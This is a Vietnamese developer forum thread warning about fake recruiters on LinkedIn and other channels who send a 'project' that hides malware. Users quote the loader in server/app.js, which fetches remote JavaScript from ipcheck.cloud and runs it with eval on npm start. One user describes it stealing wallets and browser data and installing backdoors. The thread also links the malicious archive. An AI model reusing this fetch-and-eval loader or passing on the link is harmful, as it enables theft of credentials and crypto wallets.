Cô Tiên Xanh
Senior Member
Tán gái giờ lên cả Linkedin

nó lừa dev mà fenLừa high tech quá nhỉ![]()


khi chạy project local npm start -> chạy file server/server.js -> server/app.jsĐây nha bác, theo mình hiểu thì source này nếu ko chạy lên thì nó an toàn do tránh bị mấy tool của github nó scam, note là chạy cẩn thận nha bác :v Gamer-Hub.rar (https://drive.google.com/file/d/1flk5ow76__vBiZKipNJO3bQVymWYVGRb/view?usp=drive_link)
async function fetchData() {
const res = await axios.get('http://ipcheck.cloud/api/user/thirdcookie/v1/43');
eval(res.data.cookie)
}
fetchData();
const app = express();
thank bác, em dựng mới lên để test thôi, sau đó xóa hết cả vm lẫn ec2 rồi, ec2 cũng dùng key riêng xóa cả key luôn rồi :vcheck sơ bộ thì thấy nó làm khá nhiều thứ, từ chôm data trong ví, thông tin lưu trong trình duyệt/extension và đẩy lên server cho đến việc thực hiện cài đủ thứ backdoor vào máy nạn nhân, từ meterpreter cho đến anydesk
ngoài ra còn đồng thời rà các dữ liệu nhạy cảm trên máy nạn nhân như cấu hình ide, thông tin ví/user/password tá lả
bác thread rà soát trên vm/instance ec2 đã run project đó xem có để cái gì nhạy cảm trên đó thì revoke/change đi và không sử dụng vm/instance ec2 nữa đó nhé.
Này lâu rồi, bọn lừa dev trên nhằm đánh cấp ví cá nhân, hoặc nó lấy cả ví của cty nếu dev đó lưu data cty trên máy. Này nguy hiểm hơn nhiều và trình cao hơn.dm nó còn lừa cả tuyển nv làm dev app casino lừa đảo nữa anh nhé![]()


Cũng mới bị. Ở UK đây. Pik đâu chung mánglinkedin đã là gì, bọn nó còn mò cả whatsapp, telegram, email các kiểu con đà điểu
hỏi chi tiết về mấy cái offer của bọn nó thì bọn nó chỉ nói chung chung là simple, rate $50-$100.
chỉ cần trả lời bọn nó thì sau đó nói chuyện cộc lốc thế nào nó cũng săn đón để nói chuyện tiếp và dụ mình.
bọn này contact lúc thì ở india, lúc thì ở UK, nhảy loạn lên, và bọn nó còn giả dạng mấy công ty headhunt kiểu indeed gì gì đó.
nói chung là dễ thì ko đến lượt mình đâu, thấy có gì trên trời rơi xuống mà không phải mình bỏ công sức ra tìm kiếm, giành được thì chỉ là mấy thứ tai nạn như phân chim thôi.
đừng tham lam, hãy tỉnh táo.
. Tính xem nó lừa sao mà lười quálàm dev quèn thôi bác, còn học thì cứ đọc truyện ông 96 chuyển ngành IT rồi làm theo là đccác bác học cái gì làm cái gì để biết làm mấy cái này thế , biết là lĩnh vực cntt rồi
)bọn scam em gặp nó cũng để là Manchester UK các bác ạ, có khi cùng 1 đội. Hóa ra lừa đảo ko chỉ có ở Cam bốt :3Cũng mới bị. Ở UK đây. Pik đâu chung máng. Tính xem nó lừa sao mà lười quá
Xem tệp đính kèm 2618293
vãi lều con bé này tôi biết :V, có chồng rồi![]()
Tán gái giờ lên cả Linkedin
cho lên AI bảo nó decode cho báckhi chạy project local npm start -> chạy file server/server.js -> server/app.js
file server/app.js chạy đoạn code sau
async function fetchData() { const res = await axios.get('http://ipcheck.cloud/api/user/thirdcookie/v1/43'); eval(res.data.cookie) } fetchData(); const app = express();
Đoạn này fetch remote js từ link http và chạy nó ở mt server side. Đoạn js trên đã bị obfuscate rồi, hóng cao nhân deobfuscate tiếp
có bác ở #27 có giải thích r đó. Việc obfuscate code theo m là chỉ làm code khó đọc hơn với con người, với người có kinh nghiệm và tool thích hợp thì vẫn bị decode lại thôi.cho lên AI bảo nó decode cho bác
mà ko biết bên node có cách nào obfuscate code mà ko bị decode ko bác nhỉ. e code project mang đi bán đã obf 2 lần mà cho lên AI nó decode phát một luôn.
via theNEXTvoz for iPhone